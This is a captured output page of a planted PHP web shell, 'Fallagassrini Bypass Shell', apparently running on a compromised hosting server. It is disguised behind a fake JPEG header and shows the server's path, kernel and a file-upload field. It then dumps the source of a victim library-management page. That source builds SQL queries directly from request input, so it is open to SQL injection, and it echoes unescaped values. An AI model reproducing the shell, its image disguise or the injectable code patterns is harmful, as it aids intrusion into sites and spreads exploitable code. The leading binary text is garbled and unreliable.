JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/manage_book.php

<?php include('is_autheticated.php');
//$vicky=$_POST['members'];
if(isset($_POST['submit'])) {
	$id_array = $_POST['data']; // return array
	$id_count = count($_POST['data']); // count array

	for($i=0; $i < $id_count; $i++) {
		$id = $id_array[$i];
		$query = mysql_query("DELETE FROM book WHERE `id` = '$id'");
		if($query) 
		{ 
		$msg_error="$id_count Books Are Successfully Deleted";
		}
	}
	//header("Location: view_checkin.php"); // redirent after deleting
}
 ?>
<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/invoice.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:34 GMT -->
<head>
<title>Easwary Library Lending Library</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<!--<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>-->
<link href="fonts/font-awesome.min.css" rel="stylesheet">
<!--<link href="fonts/metrize.css" rel="stylesheet">-->
<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />

	</head>  

	<body>

		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">
			<?php include('header.php'); ?>
<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Books</a> <a href="#" class="current">Manage Book</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
   
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box" style="margin-top:-10px;">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>Manage Book</h5><span class="icon" style="float:right"><a href="create_book.php"> <i class="icon-plus" title="Add Book"></i></a> </span>
        </div>
		
		<div class="widget-content nopadding" >
			      
										
										 <b style="color:#009900"> <?php if($_GET['msg']=='success') { echo "Successfully Book Inserted"; }?></label>
                           <?php if($_GET['msg']=='updated') { echo "Successfully Book Updated"; }?></label></b>
										
										<!--<ul class="links">
											<li>
												<a href="#">
													<i class="fa fa-sliders"></i>
												</a>
											</li>
										</ul>-->
								
			        
                        <form name="publication" id="publication" method="post" class="form-horizontal">
						
			                  <label for="exampleInputEmail1" class="control-label">Advance Search Book</label>
							   <div class="controls">
							  <input type="text"   name="book" id="book" onKeyUp="showbook();" autocomplete="Off" required>
						<input type="submit" name="adv_search_book" value="Search"   class="btn btn-success" />
			                 <div id="displays"></div>
			                </div>
						</form>
						
						<!-- <form name="publication" id="publication" method="post" class="form-horizontal">
			                  <label for="exampleInputEmail1" class="control-label">Search Book</label>
							   <div class="controls">
							  <input type="text"   name="book" id="book" required>
							  <input type="submit" name="search_book" value="Search"   class="btn btn-success" />
                            <input type="button" name="delete" value="Delete All" class="btn btn-success" onClick="deleteall();">
			                 <div id="display"></div>
							 </div>
			                </form>-->
						
                          
			                <table class="table table-condensed table-bordered data-table" style="margin-top:20px;">    
			                  <thead>
			                    <tr>
			                     <th>S.No</th>
								 <th style="width:20%">Book ID</th>
			                      <th style="width:20%">Book Name</th>
			                      <th style="width:20%">ISBN</th>
			                      <th style="width:15%">Category</th>
                                  <th style="width:15%">Author</th>
			                      <th style="width:15%">Action</th>
			                    </tr>
			                  </thead>
			                  <tbody>
							  <?php
							  $i=0; 
							            if(isset($_REQUEST['search_book']))
										{
										$name=$_REQUEST['book'];
										$source=mysql_query("select * from book where book_name like '%$name%' or author like '%$name%' or isbn like '%$name%' order by id desc");
										}else if(isset($_REQUEST['adv_search_book']))
										{
										$name=$_REQUEST['book'];
										$source=mysql_query("select * from book where book_name like '%$name%' or author like '%$name%' or isbn like '%$name%' or id like '%$name%'");
										}else
										$source=mysql_query("select * from book order by id desc limit 0,50");
										while($step=mysql_fetch_array($source))
										{
										$i=$i+1;
										?>
                    
			                    <tr class="gradeA">
								
			                     <td> <?php echo $i;?></td>
								  <td> <?php echo $step['id'];?></td>
			                      <td title="<?php echo $step['book_name']; ?>"><?php echo $step['book_name']; ?></td>
			                      <td><?php echo $step['isbn']; ?></td>
			                      <td>
								  <!--<?php $category=mysql_fetch_array(mysql_query("select * from category where id='".$step['category']."'")); ?>-->
								  <?php echo $step['category']; ?></td>
                                  <td title="<?php echo $step['author']; ?>">
								   <!--<?php $author=mysql_fetch_array(mysql_query("select * from author where id='".$step['author']."'")); ?>-->
								  <?php echo substr($step['author'],0,25); ?>
			                       
			                      </td>
			                     
			                       <td class="hidden-phone">
			                        <a href="edit_book.php?uid=<?php echo $step['id']; ?>" class="label label label-danger"><i class="icon icon-edit" title="Edit Book"></i></a>
									
									
								 <!-- <a href="book_action.php?did=<?php echo $step['id']; ?>" class="label label label-danger"><i class="icon icon-trash" title="Delete Book"></i></a>-->
								
			                      </td>
			                      
			                    </tr>
			                    
			                    	<?php } ?>
			             
			            <?php if($_GET['msg']=='deleted') { ?> <p <b style="color:#900">Deleted Successfully</p> <?php } ?>
						<?php if($_GET['msg']=='not_deleted') { ?> <p <b style="color:#900">Book Not Deleted!  </p> <?php } ?>
			                  </tbody>
			                </table>
							
							
			              </div>
			            </div>
			          </div>
			        </div>
			      </div>
				</div>
			
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>
			</div>
		<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
		<!--<script src="js/jquery.js"></script>-->
<script type="application/javascript">
function fill(Value)
{
$('#book').val(Value);
$('#display').hide();
}
$(document).ready(function(){
$("#book").keyup(function() {
var book = $('#book').val();
var author = $('#author').val();
var n=book.length;
if(n<8)
{
$("#display").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxbook1.php",
data: {book:book, author:author},
//data: "book="+ book ,
success: function(data){
$("#display").html(data).show();
}
});
}
});
$("#author").keyup(function() {
var author = $('#author').val();
if(author=="")
{
$("#authordisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxauthor.php",
data: "author="+ author ,
success: function(data){
$("#authordisplay").html(data).show();
}
});
}
});
$("#publication").keyup(function() {
var publication = $('#publication').val();
if(publication=="")
{
$("#publicationdisplay").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxpublication.php",
data: "publication="+ publication ,
success: function(data){
$("#publicationdisplay").html(data).show();
}
});
}
});
});

/*function truncate ($str, $length) {
    if (strlen($str) > $length) {
        $str = substr($str, 0, $length+1);
        $pos = strrpos($str, ' ');
        $str = substr($str, 0, ($pos > 0)? $pos : $length);
    }
    return $str;
}
*/
function fill2(Value)
{
$('#book').val(Value);
$('#displays').hide();
}

function showbook() {
var book = $('#book').val();
if(book=="")
{
$("#displays").html("");
}
else
{
$.ajax({
type: "POST",
url: "ajaxbook_transfer.php",
data: {book:book},
//data: "book="+ book ,
success: function(data){
$("#displays").html(data).show();
}
});
}
}
function deleteall()
{
           var favorite = [];
            $.each($("input[name='mid']:checked"), function(){            
                favorite.push($(this).val());
            });
            //alert("My favourite sports are: " + favorite.join(","));
			
			$.ajax({
					type: "POST",
					url: "delete_book.php",
					data: "book_id="+ favorite.join(",") ,
					success: function(data){
					window.location.href="manage_book.php?msg=deleted";
					}
					});
}

		</script>
		<!-- Include all compiled plugins (below), or include individual files as needed -->
		
		<script src="js/jquery.min.js"></script> 
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap.min.js"></script> 
		<script src="js/jquery.uniform.js"></script> 
		<script src="js/select2.min.js"></script> 
	<script src="js/jquery.dataTables.min.js"></script>
		<script src="js/matrix.js"></script> 
		<script src="js/matrix.tables.js"></script>
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap-colorpicker.js"></script> 
		<script src="js/bootstrap-datepicker.js"></script> 
		<!--<script src="js/jquery.toggle.buttons.js"></script>--> 
		<script src="js/masked.js"></script> 
		<script src="js/excanvas.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<!--<script src="js/matrix.dashboard.js"></script> -->
<script src="js/matrix.form_validation.js"></script>
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 
		<!--<script>
	$('.textarea_editor').wysihtml5();
</script>-->
		
<script type="text/javascript">
      //Data Tables
      $(document).ready(function () {
        $('#data-table').dataTable({
		"bSort": false,
          "sPaginationType": "full_numbers"
        });
        $("#data-table_length").css("display","none")
      });
    </script>
	<script type="text/javascript">
	function validate()
	{
	}
	</script>
<style type="text/css">

	

	button, input, select, textarea {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

	 padding: 8px 16px;

}

	

	

	.read_charges {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

    padding: 8px 16px;

}
td{
word-wrap: break-word;
}
	</style>
	</body>

<!-- Mirrored from jesus.gallery/cloud2/invoice.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:37 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net